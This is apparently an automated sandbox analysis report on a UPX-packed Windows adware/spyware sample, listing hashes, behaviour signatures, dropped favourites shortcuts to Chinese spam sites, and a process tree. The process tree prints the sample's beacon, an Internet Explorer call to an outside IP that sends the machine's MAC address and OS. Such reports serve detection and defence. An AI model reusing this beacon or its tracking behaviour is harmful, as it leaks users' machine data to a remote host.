Overview

overview

8

Static

static

8

93acca25ab...50.exe

windows7-x64

8

93acca25ab...50.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    140s
  • max time network
    160s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-10-2022 04:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe

  • Size

    143KB

  • MD5

    4131b1e0dab8aa46d82c512c723e85d5

  • SHA1

    79ffeb0a5b4403d220c3ff3cf7c3ee0f617fdac6

  • SHA256

    93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550

  • SHA512

    a93a4071919f9f3aa71ab58fbd62edac677f7c01c0ebc65fea5fb33a780f38ed1bdeae29842ae1d3231aa9518c68717b6f13e1e16ff15275d6c2a726654e82b5

  • SSDEEP

    3072:rgN+NspuUdzh5vaBAzmeu2ZN/Lh2uOhIAsdxn6sM0TZMl9V:sN+iuUdzh5vaBAz5N9mhIAsdxn6sM0Tc

Score
8/10
upx

Malware Config

Signatures

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 40 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe
    "C:\Users\Admin\AppData\Local\Temp\93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3664
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=72-e5-c3-fa-06-5d&os=Microsoft Windows XP&flag=d21f92b0ae65c1f8fe23c566927c51aa&user=93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4672
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4672 CREDAT:17410 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:5016

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize

    471B

    MD5

    6a15e3564b9eb382fe5534f59d6fccb4

    SHA1

    911dbc1a988c2d6816beb0c21c4ea5402253b884

    SHA256

    6b478c66c9a2024177d4a478ccea9a82f3162aa87a5125a0dc3750c920bdbc62

    SHA512

    2801f46d495eed08dbb10e73ccda4828faf4ef6b1ff3ff45ce8d73331e692381c25417d15c958f8c3f9c6932300cd0e66b1aad6bb5a92e2bf27b338b6d245711

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize

    434B

    MD5

    541b75ed1745beb74ef0532ac82c388f

    SHA1

    25064a91762b1e4d7ecfdcde34a62990f3a5b17e

    SHA256

    bb6717e3c0ef704463792a76ba160d060297f172bdc26cccb4719cde40e5cffc

    SHA512

    baf2a333e1c92a436f0d661ec6ed42aa8055d8251b08862f46f5f6130db9cd4b22da493bcfb00830253f767a1ce381f91087e7b89ea90e8604fe4fd2cbca6ed4

    Download Submit

  • C:\Users\Admin\Favorites\45575.comÔÚÏßµÄСÓÎÏ·.×îºÃÍæ×îÐÂ×î¿ì¿á³¬¼¶Ð¡ÓÎÏ·!.html
    Filesize

    259B

    MD5

    9eb23c46d269c9debb4345e011e07a4c

    SHA1

    1af312d49b19680ba9776e003aced6602937900f

    SHA256

    f6711066243605d4efa6c1015a4dab4d4e57063a2b84513b665d795bd572c047

    SHA512

    d39d84d0b2b0d9ec520aecbb5dcf26b5b7809048bc895c20c503ac370127f4d56af50ff525843b3bc31f1eef22c6bdae9c672a81b8591f9d1350e343c881ef23

    Download Submit

  • C:\Users\Admin\Favorites\°¬³ÈÅ®×°--×îÃÀÀöʱÉеÄÅ®×°Æ·ÅÆ.ÃÀÅ®ÂòÒ£¬Ãëɱ°¬³ÈÅ®×°!!.html
    Filesize

    261B

    MD5

    7bd1b88f31a6da5622837b47f26c9d3a

    SHA1

    8dfae3dcb5c0e295aa1d1b273af830e4f54d3d10

    SHA256

    6e3a41335a892b2dd58ede098db183b04e58a95b44c51e5de96fa07de0d02085

    SHA512

    8347d358c0157a57958242938c3e844f050b5a7e77d14ae1f7a99a6508766160b8e59bb5a94c5993d5a4c9ea901b1988c35648c9b8fd447589684f599b6ff443

    Download Submit

  • C:\Users\Admin\Favorites\µ±µ±Íø¡ªÍøÉϹºÎïÖÐÐÄ.html
    Filesize

    261B

    MD5

    0d4670b01f65bc72dbf1af3b36ef4f2d

    SHA1

    97553344d494e9b52990d3e1de18db8d1bbc8744

    SHA256

    306a437106117981a9b66c57946da8388998cda83870657b63b0858e8ae12d39

    SHA512

    217d351fa2416443f180efc75ee6306da701a5feae1ad779bbb57682e314b7a310ad0db27f2e0815c936713bbe816086a3d1bbdc9d48cc08afc8d33f0b5702b6

    Download Submit

  • C:\Users\Admin\Favorites\¿´¿´µçÊÓ¾çÔÚÏß´óÈ«,,,×îºÃÂÌÉ«×îиßËÙÃâ·ÑµçÊÓ¾çÍøÕ¾!.html
    Filesize

    266B

    MD5

    c81a8562bf7c8401b8052977fe6e802a

    SHA1

    e54c0e0b91d5a861b20548d30a2ffd350abfac09

    SHA256

    8d101ea02c9bce0d4d091b247546d4caccd887752b6f4c3b44a0f8956c303fda

    SHA512

    f9c855217976830f76a42561ddb181cbc8879a0327db7940715d3e377dd047dbd9c0852c68751dfd9a6e2f564f10338820c02c98f73ffc0a5ed9dd50fc1652cb

    Download Submit

  • C:\Users\Admin\Favorites\ÃÀÅ®·áÐØ´óÃؾ÷-20ÌìÄÚѸËÙÔö´ó´ó´ó!.html
    Filesize

    271B

    MD5

    e5c8bb1ba6bc6de3d4ddac2f0bf47e7d

    SHA1

    70900371edfcdcb01b063e731e56d129369c64a8

    SHA256

    334812944df9a9938b114b7ec02177c4bdb6cbb8dd362ea43d119a37feb2062f

    SHA512

    c3635728cb6e5327276220b57bab8c6068b50130250f8151c06134f17e143067feb04e2f47cecf6fca0d6c046325012492c67d3837ea3e57a516e0b7c4408769

    Download Submit

  • C:\Users\Admin\Favorites\ÌÔ±¦Íø - ÌÔ£¡ÎÒϲ»¶.html
    Filesize

    261B

    MD5

    c6140fc6cd1250bd67a4a22d7c74ec54

    SHA1

    d8371058038d78bd6d5dd8c13bafa21d236cf3e7

    SHA256

    a18fe5781913c54cf547f8bed109aa7de0961189bc7ee91e0a1851b6ca9d0610

    SHA512

    aa50040890a99db0d083674297f19c23f083934bbcc4eb30ee1ec358aa4418e2b017d2bd4314e9ed9d115e710637c82899915897118bc47c1e4edac8858cd3f7

    Download Submit

  • C:\Users\Admin\Favorites\Öйú¸£Àû²ÊƱ£¬ÌåÓý²ÊƱµÄͶעÖÐÐÄ.²ÊƱ´óÓ®¼Ò£¡.html
    Filesize

    261B

    MD5

    1dd93ff89bb660ccd77ec626a0cd052a

    SHA1

    b895b52dc80ac06edf398e538d1b82ae88df554a

    SHA256

    13aa3b6e21889b5f35f27aed509a62deea1c40de9cf1f9730328157dc00d8c9e

    SHA512

    254e5f9db48ccb6f293beb7865f21449bcdc151fed0f6b5dafba7dc7e52ac5829a50af3132c46832ad68f20e9d2b6f64c7b973a79b09e1b4d601033ae99e375e

    Download Submit

  • C:\Users\Admin\Favorites\׿ԽÑÇÂíÑ·ÍøÉϹºÎïͼÊ飬ÊÖ»ú£¬ÊýÂ룬¼Òµç£¬»¯×±Æ·£¬ÖÓ±í£¬Ê×ÊεÈÔÚÏßÏúÊÛ.html
    Filesize

    261B

    MD5

    8c9d533856807659bd89d3a99b1bedfc

    SHA1

    a55b51b5f91bea060463db9266dd6dbbc1de6ef5

    SHA256

    dd59719dc8255bddc6dcb6f54e27ab82b8f0285280379c8a90d5043d657f16fa

    SHA512

    2d8bb0fae1e09094b7e08b0c4dea5e4b9cf97cbf25638df1a7db14b113e6ab8a95f160a7ada024700f048962c2baf7bf963d16b783a45b83d1d20399cc81d158

    Download Submit

  • C:\Users\Admin\Favorites\×îм«Æ·ÂÌÉ«ºÃµÄµçÓ°¿âÃâ·Ñ.¸ßÇå¸ßËÙ£¡ÌìÌì¸üÐÂ!!.html
    Filesize

    264B

    MD5

    ee765b1ebea1c25ae9e7f3ce73841c46

    SHA1

    9a729deb3d211e8bbb0198bb5e7f436056293331

    SHA256

    2013251dc3e77710d417cc8c51fdcaa3d9e4ec7c019c55020994130639f87f65

    SHA512

    5cf9a564be444151dcc8cf960aee916bbd7c21874e98a0a594d2e40e5861bdbf2cac37d8da7c30b564529600c948feefd8eda45a0bd5e55e5d5b75fe9ac84434

    Download Submit

  • C:\Users\Admin\Favorites\×îÐÂÔÚÏßС˵Ãâ·ÑµÄÔĶÁ.·á¸»ÄÚÈÝËٶȿìµÄС˵վ!.html
    Filesize

    264B

    MD5

    428d1e753132e1fe27a06715e484ecc8

    SHA1

    62bd82694da83f087052c2cb6a8de923628f02a1

    SHA256

    42ca671a0639af6857bfe9716d48aa978210a66d98948a978066e1df90ad4377

    SHA512

    c21a1473639acc7f1c9f7847d0442d4ee5cbfa09d121f3024163af63a70968620bd16b56ccbca6dcb6447c4d01fb9df9dc5482ed29b38984a64afb39aadad317

    Download Submit

  • memory/3664-134-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download

  • memory/3664-133-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download

  • memory/3664-132-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download